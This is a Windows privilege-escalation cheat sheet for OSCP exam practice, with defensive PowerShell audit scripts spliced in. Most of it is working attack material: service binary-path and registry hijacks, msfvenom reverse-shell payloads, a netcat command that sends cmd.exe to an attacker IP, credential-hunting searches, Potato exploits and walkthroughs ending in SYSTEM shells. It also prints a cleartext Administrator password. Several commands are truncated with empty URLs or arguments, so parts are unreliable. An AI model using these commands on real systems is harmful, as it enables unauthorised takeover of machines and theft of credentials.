Windows Privilege Escalation

In the OSCP exam, gaining initial access is not enough. Most of the machines require escalating to a higher privilege. To learn more about Windows privilege escalation, I took a course on Udemy, watched IppSec's YouTube videos, and read tutorials from various sources. I took notes on whatever I learned.

I have organized my notes as a cheat sheet, which is now public.

Note: A cheat sheet is not understandable without basic knowledge! After all, a cheat sheet is not a tutorial!

Note: If you find this cheat sheet helpful, please share it! And if you want to connect with me, follow my Facebook page and leave a review:

Follow me on Twitter:


I also follow two standard checklists that are available online:

  1. Hacktricks escalation checklist
  2. PayloadAllTheThings Escalation CheatSheet

Helpful Tools

  1. WinPEAS: This tool checks common misconfigurations that may lead to privilege escalation.
  2. PowerUp: A PowerShell script that checks for common vulnerabilities.
  3. Windows-Exploit-Suggester: A Windows kernel exploit suggester.
  4. icacls (Windows): Displays the Access Control List of the specified files or folders.


All tools first need to be transferred to the target machine!

#WinPEAS
.\winpeas.exe serviceinfo

#PowerUp: start PowerShell with the execution policy bypassed, then dot-source the script
powershell.exe -exec bypass
. .\

Windows Exploit Suggester:

From the target, first collect the output of the systeminfo command and save it on Kali.

#Update the local database, then compare it against the collected systeminfo output
python -u
python -i systeminfo.txt -u *.xls

#Check the ACL of a file or folder
icacls "path_to_check"


We need to enumerate basic information before attempting to escalate privilege.

#Get Windows version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

#Get patch information
wmic qfe get Caption, Description, HotFixID, InstalledOn

#Get current username
whoami

#Get groups and privilege information
whoami /all

#Get user list
net user

#Get information for a specific user
net user admin

#Get OS information like version, hotfixes, etc.
systeminfo

#List network connections and listening ports with the owning PID. Keep note of the suspicious ones!
netstat -ano

#List all profiles' firewall rules
netsh advfirewall firewall show rule name=all

#List all installed software
wmic product get name

#List all installed software with version
wmic product get name, version

#Get scheduled task list
schtasks /query /fo LIST /v

#Running processes with their services
tasklist /SVC

#Loaded drivers (look for vulnerable ones)
driverquery.exe /fo table

Kernel Exploits

Kernel exploits can be dangerous, so a kernel exploit should only be run if there is no other way to escalate privilege.

Get the system information and transfer it to a remote Linux host. This is the command we need to run before searching for exploits on Google or Searchsploit:

$ systeminfo

Use Windows Exploit Suggester to get exploit suggestions:

python -u
python -i systeminfo.txt -u *.xls

We can use the information generated by Windows-Exploit-Suggester to find a compiled exploit at the following link:

Find exploits on Google and with Searchsploit. Example:

Google> Windows Version Privilege Escalation Exploit
Searchsploit> $ searchsploit windows 10

Service Exploits

If a service is improperly configured, it may let us escalate to a higher privilege. A service can be exploited in five ways:

  1. Insecure Service Permission
  2. Unquoted Service Path
  3. Insecure Registry Permission
  4. Insecure Service Executable
  5. DLL Hijacking

Service Enumeration

We should find all running services and their versions.

tasklist /SVC


wmic service list brief

Listing All Running Services

sc queryex type= service
powershell.exe -c "Get-Service | Where-Object {$_.Status -eq 'Running'}"

Search for more info on a suspicious service with these cmd/PowerShell commands:

sc queryex type= service state= all | find /i "SERVICE_NAME: service_name"
powershell.exe -c "Get-Service | Where-Object {$_.Name -like '*service_name*'}"

Find the status of the target service. We can check with these commands:

sc query service_name 
Get-Service service_name

Modifying a service binary path

sc config service_name binpath= "c:\windows\temp\shell.exe"

Start and Stop a Service

net start serv_name
net stop serv_name

Exploit Insecure Services Permission

We need to find a suspicious service name. If our user has SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS on a service, we can exploit it by changing its binary path.

sc qc service_name
sc config service_name binpath= "c:\windows\temp\backdoor.exe"
net stop service_name
net start service_name

Exploiting Unquoted Service Path

If the path of a service binary is not enclosed in quotes, it may help us escalate privilege. Any one folder along the service path needs to be writable. For example, I found C:\Program Files\Deploy Ready\Service Files\Deploy.exe. Inside the C:\Program Files\ directory, the "Deploy Ready" and "Service Files" subdirectories are writable. We can exploit this vulnerability to escalate privilege. How does it work?

  1. When the service starts, Windows may fail to execute Deploy.exe directly
  2. It will then execute C:\Program Files\Deploy Ready\Service.exe
  3. If Service.exe is not found, C:\Program Files\Deploy.exe will be executed!

Find Vulnerability

#With wmic
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

#With winPEAS
.\winPEAS.exe quiet servicesinfo

Test if any directory is writable:

  1. Manually
echo "Test" > "C:\Path a\Path b\Path c\test.txt" #no "Access is denied"? We are fine then
icacls "C:\Path a\Path b\Path c\test.txt" #F=Full, W=Write
  2. With accesschk (more efficient)
.\accesschk.exe /accepteula -uwdq C:\
.\accesschk.exe /accepteula -uwdq "C:\Program Files\"
.\accesschk.exe /accepteula -uwdq "C:\Program Files\Service Path"


If we don't have permission to restart the service, we can try to reboot the machine. And if the service is configured with AUTO_START and runs as LocalSystem, we will get a SYSTEM shell.

sc qc "service_name"
copy \\smb_ip\share\Service.exe "C:\Program Files\Deploy Ready\Service.exe"
net start service_name
#If unable to start the service, try rebooting
shutdown /r /t 0

Insecure Registry Permission

If we can't write to the service's directory but can modify or write to its registry key, we can escalate privilege.

Find Services

#Get all services info
.\winPEAS.exe quiet servicesinfo

#Or list the ImagePath of every service from the registry
reg query hklm\System\CurrentControlSet\Services /s /v imagepath

Confirm weak registry permissions

#Confirm weak permissions with a PowerShell command
Get-Acl HKLM:\System\CurrentControlSet\Services\SrvName | Format-List

#Confirm with accesschk
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\SrvName


If we confirm that we can modify the registry:

#Add backdoor to the registry
reg add HKLM\SYSTEM\CurrentControlSet\Services\SrvName /v ImagePath /t REG_EXPAND_SZ /d C:\windows\temp\backdoor.exe /f
#Start the service
net start SrvName
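The four service weaknesses above (unquoted path, writable service binary, writable folder on the path, writable service registry key) can be audited in one pass from the defender's side. The script below is an added example, not code from the original cheat sheet and not winPEAS or accesschk output. It assumes an elevated PowerShell 5.1 session so every ACL can be read, English identity names (BUILTIN\Users and the like; localize them on non-English systems), and that the remediation strings it prints are reviewed by a human before being run; it changes nothing itself.

```powershell
# Added audit example (not part of the original cheat sheet). It reports each
# service weakness with the fix a defender would apply. Nothing is modified.
# Assumes an elevated PowerShell 5.1 session and English identity names.

$LowPrivGroups = @('Everyone', 'BUILTIN\Users',
                   'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

function Get-LowPrivWriters {
    # Returns the low-privilege identities holding a write-class right on a
    # file, folder or registry key; returns nothing if the ACL is unreadable.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    $hits = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivGroups -notcontains $ace.IdentityReference.Value) { continue }
        if ($ace -is [System.Security.AccessControl.RegistryAccessRule]) {
            $rights = [int]$ace.RegistryRights
            $mask   = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, FullControl'
        } else {
            $rights = [int]$ace.FileSystemRights
            $mask   = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, FullControl'
        }
        # 0x50000000 = GENERIC_ALL | GENERIC_WRITE, which some inherited ACEs carry
        if (($rights -band $mask) -ne 0 -or ($rights -band 0x50000000) -ne 0) {
            $ace.IdentityReference.Value
        }
    }
    $hits | Sort-Object -Unique
}

function Get-ServiceWeakness {
    # One object per finding: service, weakness type, who can write, and the fix.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $raw = $svc.PathName
        if (-not $raw) { continue }
        $quoted = $raw.StartsWith('"')
        # Executable on disk: the quoted part, or everything up to the first ".exe"
        $exe = if ($quoted -and $raw -match '^"([^"]+)"') { $Matches[1] }
               elseif ($raw -match '^(.+?\.exe)') { $Matches[1] }
               else { $raw }
        $svcKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
        $emit = { param($Type, $Object, $Who, $Fix)
            [pscustomobject]@{
                Service = $svc.Name; Type = $Type; Object = $Object
                WritableBy = ($Who -join ', '); Remediation = $Fix
            } }

        # 1. Unquoted path containing spaces: fix by quoting the ImagePath
        if (-not $quoted -and $exe.Contains(' ')) {
            $fixedPath = '"' + $exe + '"' + $raw.Substring($exe.Length)
            & $emit 'UnquotedPath' $raw '-' "Set-ItemProperty -Path '$svcKey' -Name ImagePath -Value '$fixedPath'"
        }
        # 2. Service binary replaceable by low-privilege users
        $who = @(Get-LowPrivWriters $exe)
        if ($who) { & $emit 'WritableBinary' $exe $who "icacls `"$exe`" /remove:g `"$($who[0])`"" }
        # 3. Folders: the binary's own folder always matters (DLL hijacking);
        #    every ancestor matters only when the path is unquoted.
        $dirs = @()
        $dir = Split-Path -Path $exe -Parent
        while ($dir) {
            $dirs += $dir
            if ($quoted) { break }
            $dir = Split-Path -Path $dir -Parent
        }
        foreach ($d in $dirs) {
            $who = @(Get-LowPrivWriters $d)
            if ($who) { & $emit 'WritableFolder' $d $who "icacls `"$d`" /remove:g `"$($who[0])`"" }
        }
        # 4. Service registry key writable (ImagePath can be repointed)
        $who = @(Get-LowPrivWriters $svcKey)
        if ($who) { & $emit 'WritableRegistryKey' $svcKey $who "Remove the write ACE for $($who[0]) on $svcKey with Get-Acl / Set-Acl" }
    }
}

Get-ServiceWeakness | Format-Table -AutoSize -Wrap
```

On a default installation the WritableFolder check flags C:\ itself for every unquoted path, because Authenticated Users may create subfolders there; that is the real reason the C:\Program.exe trick works, and quoting the path is the cheaper fix than re-ACLing the drive root.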

DLL Hijacking

If a program or service cannot find a DLL it tries to load in the specified directory, we can supply our own malicious DLL for escalation. The folder the DLL is loaded from needs to be writable!

Check the permissions of the program folder

icacls C:\program\

Create a malicious DLL file and move the payload into the directory the program searches.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_IP LPORT=attacker_port -f dll -o existing.dll

Now try to restart the service or execute the vulnerable program.

Exploit Startup Program

We need to copy accesschk64.exe to the remote host to check permissions. If we have FILE_ALL_ACCESS on a program, we can replace it to get a SYSTEM shell.

accesschk64.exe -wvu "C:\Program Files\Autorun Program"
copy \\smb_ip\share\backdoor.exe "C:\Program Files\Autorun Program\program.exe"

We can also get an admin session by exploiting startup applications. Check the permissions: if the folder has write permission, we just need to copy our shell.exe into it and wait for an admin to log in.

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
copy \\smb_ip\share\bak.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bak.exe"

Exploiting AlwaysInstallElevated

We need to check whether it is enabled. If the value is 0x1, we can exploit it!

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Generate a backdoor with Metasploit and transfer it to the victim machine:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tester_ip LPORT=tester_port -f msi -o smb-folder/shell.msi

Copy shell.msi to the victim machine using SMB or another way and run:

msiexec /quiet /qn /i shell.msi
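The reg query lines above show the raw values; the caveat a practitioner wants is that the policy is only in force when both the HKLM and the HKCU value are 1, so one key alone is not a finding. The function below is an added example, not part of the original cheat sheet: it reads both keys, reports whether the policy is effective, and with -Disable resets the values that are set. It assumes the current user can write HKCU and that the shell is elevated when the HKLM value needs changing.

```powershell
# Added example (not from the original cheat sheet): report whether
# AlwaysInstallElevated is actually effective and optionally switch it off.
# The policy only takes effect when BOTH the machine and the user value are 1.

function Get-AlwaysInstallElevated {
    param([switch]$Disable)
    $keys = @('HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
              'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer')
    $state = foreach ($k in $keys) {
        # A missing key or value reads as $null, i.e. the policy is not set there
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $k; Value = $v; Set = ($v -eq 1) }
    }
    $effective = (@($state | Where-Object { $_.Set }).Count -eq 2)
    if ($Disable) {
        foreach ($s in ($state | Where-Object { $_.Set })) {
            # Only values currently set to 1 are touched. A GPO would re-apply
            # them at the next refresh, so on domain machines fix the policy itself.
            Set-ItemProperty -Path $s.Key -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
    [pscustomobject]@{ Effective = $effective; Keys = $state }
}

$result = Get-AlwaysInstallElevated
$result.Keys | Format-Table -AutoSize
if ($result.Effective) {
    Write-Warning 'AlwaysInstallElevated is in force: any user can install an MSI as SYSTEM'
} else {
    'AlwaysInstallElevated is not effective on this host'
}
```

Run `Get-AlwaysInstallElevated -Disable` from an elevated prompt to clear both values; if the setting comes from Group Policy it will return at the next policy refresh, which is itself a useful signal that the GPO needs fixing.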

Exploiting Clear Text Passwords

If we are lucky, we may find passwords in clear text.

Note: This section is heavily copied from

Finding Wi-Fi passwords

netsh wlan show profile
netsh wlan show profile <SSID> key=clear

Search for sensitive files that may contain credentials

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll"

Search for "password"

#Search suspicious files by filename
dir /s /W *pass* == *cred* == *vnc* == *.config* | findstr /i/v "\\windows"

#Search suspicious files by content
findstr /D:C:\ /si password *.xml *.ini *.txt #A lot of output can be generated
findstr /D:C:\ /M /SI password *.xml *.ini *.txt 2>nul | findstr /V /I "\\AppData\\Local \\WinXsX ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.CloudExperienceHost" 2>nul

Search for passwords in the registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" #Autologin
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s #Check the values saved in each session, user/password could be there
reg query "HKCU\Software\OpenSSH\Agent\Key"

# Search for passwords inside all the registry
reg query HKLM /f password /t REG_SZ /s #Look for registries that contains "password"
reg query HKCU /f password /t REG_SZ /s #Look for registries that contains "password"

Try with winPEAS:

.\winPEAS.exe quiet filesinfo userinfo


Using cmdkey (saved credentials)

cmdkey /list
runas /savecred /user:Administrator "c:\windows\temp\backdoor.exe"

By providing credentials (runas prompts for the password; it cannot be passed on the command line)

C:\Windows\System32\runas.exe /env /noprofile /user:<username> "c:\users\Public\nc.exe -nv <attacker-ip> 4444 -e cmd.exe"

Exploiting Well-known Software

Some software installed on the target machine may have a public exploit. We should search for an exploit matching the version of the installed software.

tasklist /v 
.\winpeas.exe quiet processinfo

Scheduled Tasks

#From cmd
schtasks /query /fo LIST /v
#In PowerShell
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

In the example above, the command found that C:\Tools\Adm.Ps1 runs every 10 minutes as SYSTEM, and we have the right to modify it:

accesschk.exe /accepteula -quvw user C:\Tools\Adm.Ps1

We can simply append our command so that it executes as SYSTEM. Let's append a command that runs rev.exe (a reverse shell to port 443):

echo C:\windows\temp\rev.exe >> C:\Tools\Adm.Ps1

If everything goes well, we should have a shell as a system in 10 minutes!
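The accesschk line above checks one task file by hand. As an added example (not part of the original cheat sheet), the function below does the same check for every non-Microsoft scheduled task: it lists tasks whose action file, or the folder holding it, can be changed by ordinary users while the task runs under another account such as SYSTEM, which is exactly the C:\Tools\Adm.Ps1 situation. It assumes an elevated PowerShell 5.1 session (Get-ScheduledTask hides other users' tasks otherwise) and English identity names.

```powershell
# Added example (not from the original cheat sheet): find scheduled tasks
# whose script or binary can be modified by low-privilege users.
# Assumes an elevated PowerShell 5.1 session and English identity names.

function Get-WeakScheduledTask {
    $lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
    # Write bits of FileSystemRights (0x116) + Delete (0x10000) + GENERIC_WRITE/GENERIC_ALL
    $writeMask = 0x50010116
    foreach ($task in Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' }) {
        $runAs = $task.Principal.UserId
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }          # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
            $targets = @($exe)
            # cmd/powershell launchers: the real payload is the script path in Arguments
            if ($action.Arguments -match '([A-Za-z]:\\[^"\s]+\.(ps1|bat|cmd|vbs|exe))') {
                $targets += $Matches[1]
            }
            foreach ($t in $targets) {
                # Check the file itself and the folder it lives in (delete + recreate)
                foreach ($p in @($t, (Split-Path -Path $t -Parent))) {
                    if (-not $p -or -not (Test-Path -LiteralPath $p)) { continue }
                    $acl = Get-Acl -LiteralPath $p -ErrorAction SilentlyContinue
                    if (-not $acl) { continue }
                    $writers = @($acl.Access | Where-Object {
                        $_.AccessControlType -eq 'Allow' -and
                        $lowPriv -contains $_.IdentityReference.Value -and
                        (([int]$_.FileSystemRights -band $writeMask) -ne 0)
                    } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique)
                    if ($writers.Count -gt 0) {
                        [pscustomobject]@{
                            Task        = $task.TaskPath + $task.TaskName
                            RunsAs      = $runAs
                            Object      = $p
                            WritableBy  = ($writers -join ', ')
                            Remediation = "icacls `"$p`" /remove:g `"$($writers[0])`" (or move the script under a folder only admins can write)"
                        }
                    }
                }
            }
        }
    }
}

Get-WeakScheduledTask | Format-Table -AutoSize -Wrap
```

A task is only a problem when RunsAs differs from the users who can write the file; a task that runs as the same low-privilege user who owns the script gains that user nothing, so filter on RunsAs before acting on the output.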

Dangerous User Privileges

Some privileges granted to a user are dangerous: they could lead to escalation to a higher privilege. I will list some of them:

SeImpersonatePrivilege

It can act as any other user, such as Administrator. The vulnerability can be exploited with JuicyPotato.

SeAssignPrimaryTokenPrivilege

Assign an access token to a new process. Can be exploited with JuicyPotato.

SeBackupPrivilege

If a user has this privilege, he is able to read any file. That means the user can extract password hashes from the registry, which could be used for a pass-the-hash attack.

Another privilege of this kind grants the user the right to modify service binaries and DLLs, and also to modify registry settings.

Other risky privileges

  1. SeCreateTokenPrivilege
  2. SeLoadDriverPrivilege
  3. SeDebugPrivilege

Hot Potato Exploit

A tutorial:

Windows 7

.\Potato.exe -ip <local ip> -cmd <command to run> -enable_defender true -enable_spoof true -disable_exhaust true

Windows 10

.\Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true

Juicy Potato

If the user holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, JuicyPotato can be used to escalate privilege.

Note: A CLSID can be found in:

JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}

Rogue Potato

"Just another Windows Local Privilege Escalation from Service Account to System." So the requirement is that the compromised account is a service account.

.\RoguePotato.exe -r <attacker-ip> -l 9999 -e "C:\Windows\Temp\rev.exe"

Quick Real Example


Unquoted Service

OS Name: Microsoft Windows Server 2012 R2 Datacenter
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
> whoami /all
User Name SID
================= =============================================
deployable\tomcat S-1-5-21-2340103987-1023754366-731290932-1001
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

> wmic product get name, version
> powershell -c Invoke-WebRequest "" -OutFile "wino.exe"

> .\wino.exe serviceinfo
Deploy(Deploy)[C:\Program Files\Deploy Ready\Service Files\Deploy.exe] - Manual - Stopped - No quotes and Space detected
> cd "C:\Program Files\Deploy Ready\"

Generating the exploit in Kali, starting a Python web server and listening for the connection:

$ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 -f exe > Deploy.exe
$ python3 -m http.server
$ nc -lvp 1338

Downloading and running the exploit on Windows:

sc qc deploy
>powershell -c Invoke-WebRequest "" -OutFile "C:\Program Files\Deploy Ready\Service.exe"
>sc start deploy

Clear Text Password

I was just able to get a shell by exploiting BlogEngine. I uploaded WinPEAS and it was able to find AutoLogon credentials.

Here are the steps I did in Kali to get Administrator access:

winexe -U Administrator%PzCEKhvj6gQMk7kA // cmd.exe

Escalated with JuicyPotato

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

Note: JuicyPotato doesn't work on Windows Server 2019 and Windows 10 1809+.

Generated another shell:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1338 -f exe > shell1338.exe

Uploaded JuicyPotato.exe and shell1338.exe:

powershell -c Invoke-WebRequest "" -OutFile "shell1338.exe"
powershell -c Invoke-WebRequest "" -OutFile "JuicyPotato.exe"

Execute for a SYSTEM shell (a CLSID can be found in: and ; not tested):

JuicyPotato.exe -t * -l 1010 -p shell1338.exe
JuicyPotato.exe -t * -l 1010 -p shell1338.exe -c {cls_id}

Modify Binary to Escalate

I was logged in via Evil-WinRM. WinPEAS did not find anything, so I tried manual enumeration. Here are the steps of the escalation:

Evil-WinRM PS C:> services
Path Privileges Service
---- ---------- -------
"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" False AmazonSSMAgent
"C:\Program Files\Amazon\XenTools\LiteAgent.exe" False AWSLiteAgent
"C:\Program Files\Amazon\cfn-bootstrap\winhup.exe" False cfn-hup
C:\Services\monitor1.exe True monitor1
C:\Services\monitor2.exe True monitor2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe False PerfHost
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller

Evil-WinRM PS C:> icacls Services\monitor1.exe
Services\monitor1.exe BUILTIN\Users:(I)(F)
Successfully processed 1 files; Failed processing 0 files

Evil-WinRM PS C:\services> upload /home/bytef/cybsec/monitor1.exe
Info: Uploading /home/bytef/cybsec/monitor1.exe to C:\services\monitor1.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
Evil-WinRM PS C:\services> cmd /c "sc start monitor1"
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Evil-WinRM PS C:\services>

And quickly I got a SYSTEM shell.